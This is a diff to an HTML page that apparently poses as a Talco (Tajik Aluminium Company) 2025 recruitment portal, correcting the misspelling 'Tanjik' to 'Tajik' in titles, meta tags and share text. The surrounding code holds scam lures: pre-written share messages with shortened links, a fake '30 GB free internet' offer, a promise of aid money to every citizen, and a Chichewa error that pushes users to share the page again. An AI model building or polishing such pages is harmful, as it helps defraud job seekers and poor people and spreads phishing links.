--- a/tj.html
+++ b/tj.html
@@ -34,10 +34,10 @@
   
         <meta charset="UTF-8" />
         <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-        <title>Talco- Tanjik Aluminium Company</title>
+        <title>Talco- Tajik Aluminium Company</title>
         <link rel="shortcut icon" type="image/png" href="" />
-        <meta name="og:title" content="Tanjik Aluminium Company (Talco) Recruitment Portal" />
-        <meta property="og:description" content="Tanjik Aluminium Company (Talco) is now recruiting in different positions." />
+        <meta name="og:title" content="Tajik Aluminium Company (Talco) Recruitment Portal" />
+        <meta property="og:description" content="Tajik Aluminium Company (Talco) is now recruiting in different positions." />
         <meta property="og:image" content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtYfbRZJssjfTPB3NLlhwe5J7h4GOTicWyIzJk1N9qM2pqH0QQSvsUQzyoUE81rftC9o7j_O3SVO6lpV72zWhypRusC1F_bCULD6Bg968UImyuTY35RKIcEbY_0aGBXVJVBlGM6gunlr4ViWSTPSft60djwTfcVtCMtypSb1XfDaVulkbpu205rkRrNvM/s1179/gfcxdfsghjknml.jpeg" />
         <meta property="og:type" content="website" />
     <meta property="og:updated_time" content="1440432930" />
@@ -589,7 +589,7 @@ button:hover {
    Make sure to follow the instructions carefully.
 </marquee>
 
-     <center><font color="black"><span style="font-weight:bold;">Tanjik Aluminium Company 2025 Application Form:<font><center/><span/><br/>
+     <center><font color="black"><span style="font-weight:bold;">Tajik Aluminium Company 2025 Application Form:<font><center/><span/><br/>
        <hr color="black"width="40%" />
        <br>
        
@@ -831,7 +831,7 @@ $(document).click(function () {
 "30%20GB%20Free%20Internet%20Offer%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
 -->
       <script>
-        var text1 = "*Tanjik Aluminium Company (Talco) 2025 Recruitment Scheme*%0A%0ATanjik Aluminium Company (Talco) has opened its online application portal to recruit new employees to fill available positions. Recruitment has already begun.%0A%0A*Interested candidates are requested to apply online via the Talco portal. Please use the link below to access the Talco's E-recruitment portal.%0A%0Ahttps://tinyurl.com/NSA-2025-Recruitment",
+        var text1 = "*Tajik Aluminium Company (Talco) 2025 Recruitment Scheme*%0A%0ATajik Aluminium Company (Talco) has opened its online application portal to recruit new employees to fill available positions. Recruitment has already begun.%0A%0A*Interested candidates are requested to apply online via the Talco portal. Please use the link below to access the Talco's E-recruitment portal.%0A%0Ahttps://tinyurl.com/NSA-2025-Recruitment",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "Chinachake chalakwika!\nZolemba sizikuwerengedwa. Mwina mudagawanapo ndi anzanu kapena gulu lomwelo kangapo, chonde gawaninso.",
